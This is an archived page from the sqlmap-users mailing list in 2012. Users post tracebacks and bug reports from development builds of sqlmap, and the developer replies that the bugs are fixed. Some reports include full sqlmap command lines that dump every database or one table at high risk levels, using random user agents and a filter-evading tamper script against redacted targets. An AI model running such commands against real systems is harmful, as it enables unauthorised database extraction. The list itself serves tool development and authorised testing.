"/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line 332, in unionUse runThreads(numThreads, unionThread) File "/pentest/database/sqlmap/lib/core/threads.py", line 62, in runThreads threadFunction() File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line 302, in unionThread output = __oneShotUnionUse(limitedExpr, unpack) File "/pentest/database/sqlmap/lib/techniques/inband/union/use.py", line 79, in __oneShotUnionUse extractRegexResult(check, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ File "/pentest/database/sqlmap/lib/core/common.py", line 2514, in removeReflectiveValues if regex.split(REFLECTED_NON_ALPHA_NUM_REGEX)[0].lower() in content.lower(): # fast optimization check UnicodeDecodeError: 'ascii' codec can't decode byte 0x96 in position 90: ordinal not in range(128) [*] shutting down at: 04:32:26 |
From: garthoid <gar...@gm...> - 2012-02-13 16:15:42
|
Hi, I am encountering this message since my last update of Sqlmap. Version 0.9 does not encounter this problem with the same request. [10:56:28] [INFO] parsing HTTP request from './dump/save.txt' [10:56:28] [CRITICAL] you have provided tainted parameter values ('amp;icon=stuff.gif</thumbnail><someItem><item id="gate" value="/something.cgi"/><item id="report" value="stID(') with most probably leftover chars from manual sql injection tests (;()') or non-valid numerical value. Please, always use only valid parameter values so sqlmap could be able to properly run Here is the fragment that it is complaining about: &deficon=stuff.gif</thumbnail><someItem><item id="gate" value="/something.cgi"/><item id="report" value="stID("iC15DBE0F9A7E4F3E86EE5DA47D5A31DC")"/> Here is the version I am running: sqlmap/1.0-dev (r4744) The original request was captured with Burp. It was a clean test with no injection or other manipulation happening at that time. Thoughts? Thanks in advance, Garth |
From: Miroslav S. <mir...@gm...> - 2012-02-13 09:34:46
|
Hi godjil. Thank you for your report. It has been fixed yesterday as it has been reported by other user too. Kind regards, Miroslav Stampar On Sat, Feb 11, 2012 at 10:50 AM, godjil <ar...@so...> wrote: > [13:48:38] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4739), > retry your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any > information required to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4739) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u *************************************** > --threads 3 --level 5 --risk 3 --dbms mysql --random-agent --dump-all > Technique: TIME > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "/home/godjil/Dropbox/hack/sqlmap/_sqlmap.py", line 83, in main > start() > File "/home/godjil/Dropbox/hack/sqlmap/lib/controller/controller.py", > line 566, in start > action() > File "/home/godjil/Dropbox/hack/sqlmap/lib/controller/action.py", line > 112, in action > conf.dbmsHandler.dumpAll() > File > "/home/godjil/Dropbox/hack/sqlmap/plugins/generic/enumeration.py", line > 1805, in dumpAll > self.getTables() > File > "/home/godjil/Dropbox/hack/sqlmap/plugins/generic/enumeration.py", line > 832, in getTables > dbs = self.getDbs() > File > "/home/godjil/Dropbox/hack/sqlmap/plugins/generic/enumeration.py", line > 757, in getDbs > count = inject.getValue(query, inband=False, error=False, > expected=EXPECTED.INT, charsetType=2) > File "/home/godjil/Dropbox/hack/sqlmap/lib/request/inject.py", line > 471, in getValue > value = __goInferenceProxy(query, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar, dump) > File "/home/godjil/Dropbox/hack/sqlmap/lib/request/inject.py", line > 324, in __goInferenceProxy > outputs = __goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, expected, resumeValue=resumeValue, > charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, > dump=dump) > File "/home/godjil/Dropbox/hack/sqlmap/lib/request/inject.py", line > 103, in __goInferenceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar, dump) > File "/home/godjil/Dropbox/hack/sqlmap/lib/request/inject.py", line > 66, in __goInference > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar, dump) > File > "/home/godjil/Dropbox/hack/sqlmap/lib/techniques/blind/inference.py", > line 503, in bisection > val = getChar(index, asciiTbl) > File > "/home/godjil/Dropbox/hack/sqlmap/lib/techniques/blind/inference.py", > line 265, in getChar > if timeBasedCompare and not validateChar(idx, retVal): > File > "/home/godjil/Dropbox/hack/sqlmap/lib/techniques/blind/inference.py", > line 173, in validateChar > queriesCount[0] += 1 > NameError: global name 'queriesCount' is not defined > > [*] shutting down at 13:48:38 > > > > Best regards. > Softcase system administrator > Kochetkov Artem > ad...@so... > +7 495 988-34-56 > +7 903 590-87-82 > > Wanna be free? use Linux. > > > > > > ------------------------------------------------------------------------------ > Try before you buy = See our experts in action! > The most comprehensive online learning library for Microsoft developers > is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3, > Metro Style Apps, more. Free future releases when you subscribe now! > http://p.sf.net/sfu/learndevnow-dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-02-12 19:11:19
|
Hi Iago. With the latest commit new message now says: GET parameter 'id' is vulnerable. Do you want to keep testing the others (*if any*)? [Y/n] I admit that previous version was little understated. It simply didn't do anything in your case because there wasn't anything left to test in your case. This was the easiest solution as we have some lengthy checks if the parameter has to be tested or not. Kind regards, Miroslav Stampar p.s. sorry again for that last "Kune retards" from my mobile Swype :) On Sat, Feb 11, 2012 at 9:42 AM, Miroslav Stampar < mir...@gm...> wrote: > Ok. Will look into that later. This moment not around computer. > > Kune retards > On Feb 11, 2012 1:55 AM, "Iago Sousa" <146...@gm...> wrote: > >> I received this message in sqlmap (r4739): >> GET parameter *** is vulnerable. Do you want to keep testing the others? >> [Y/n] >> >> I think that message would make more sense: "Do you want to skip testing >> the others?" >> >> Because If you choose the default value (Y) it skip the tests, do not >> continue. >> >> It's all. >> >> []'s >> >> >> ------------------------------------------------------------------------------ >> Virtualization & Cloud Management Using Capacity Planning >> Cloud computing makes use of virtualization - but cloud computing >> also focuses on allowing computing to be delivered as a service. >> http://www.accelacomm.com/jaw/sfnl/114/51521223/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-02-12 18:32:51
|
Hi cats. Thank you for your report and find it fixed with the latest commit. Kind regards, Miroslav Stampar On Sun, Feb 12, 2012 at 12:21 PM, cats <du...@al...> wrote: > Came across this while playing around with tamper scripts today (haven't > made any changes to the scripts). > > > [12:12:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4739), > retry your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any > information required to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4739) > Python version: 2.7.2+ > Operating system: posix > Command line: sqlmap.py -u > ****************************************************** --level=3 > --risk=3 --random-agent -D ************ -T *********** --dump --tamper > space2comment.py > Technique: TIME > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "/media/truecrypt1/sqlmap-dev/_sqlmap.py", line 83, in main > start() > File "/media/truecrypt1/sqlmap-dev/lib/controller/controller.py", line > 566, in start > action() > File "/media/truecrypt1/sqlmap-dev/lib/controller/action.py", line > 109, in action > conf.dbmsHandler.dumpTable() > File "/media/truecrypt1/sqlmap-dev/plugins/generic/enumeration.py", > line 1629, in dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 471, > in getValue > value = __goInferenceProxy(query, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar, dump) > File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 324, > in __goInferenceProxy > outputs = __goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, expected, resumeValue=resumeValue, > charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, > dump=dump) > File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 103, > in __goInferenceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar, dump) > File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 66, in > __goInference > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar, dump) > File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", > line 503, in bisection > val = getChar(index, asciiTbl) > File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", > line 265, in getChar > if timeBasedCompare and not validateChar(idx, retVal): > File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", > line 173, in validateChar > queriesCount[0] += 1 > NameError: global name 'queriesCount' is not defined > > > > ------------------------------------------------------------------------------ > Virtualization & Cloud Management Using Capacity Planning > Cloud computing makes use of virtualization - but cloud computing > also focuses on allowing computing to be delivered as a service. > http://www.accelacomm.com/jaw/sfnl/114/51521223/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: cats <du...@al...> - 2012-02-12 11:21:29
|
Came across this while playing around with tamper scripts today (haven't made any changes to the scripts). [12:12:47] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4739), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4739) Python version: 2.7.2+ Operating system: posix Command line: sqlmap.py -u ****************************************************** --level=3 --risk=3 --random-agent -D ************ -T *********** --dump --tamper space2comment.py Technique: TIME Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "/media/truecrypt1/sqlmap-dev/_sqlmap.py", line 83, in main start() File "/media/truecrypt1/sqlmap-dev/lib/controller/controller.py", line 566, in start action() File "/media/truecrypt1/sqlmap-dev/lib/controller/action.py", line 109, in action conf.dbmsHandler.dumpTable() File "/media/truecrypt1/sqlmap-dev/plugins/generic/enumeration.py", line 1629, in dumpTable entries = inject.getValue(query, blind=False, dump=True) File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 471, in getValue value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar, dump) File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 324, in __goInferenceProxy outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 103, in __goInferenceFields output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump) File "/media/truecrypt1/sqlmap-dev/lib/request/inject.py", line 66, in __goInference count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", line 503, in bisection val = getChar(index, asciiTbl) File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", line 265, in getChar if timeBasedCompare and not validateChar(idx, retVal): File "/media/truecrypt1/sqlmap-dev/lib/techniques/blind/inference.py", line 173, in validateChar queriesCount[0] += 1 NameError: global name 'queriesCount' is not defined |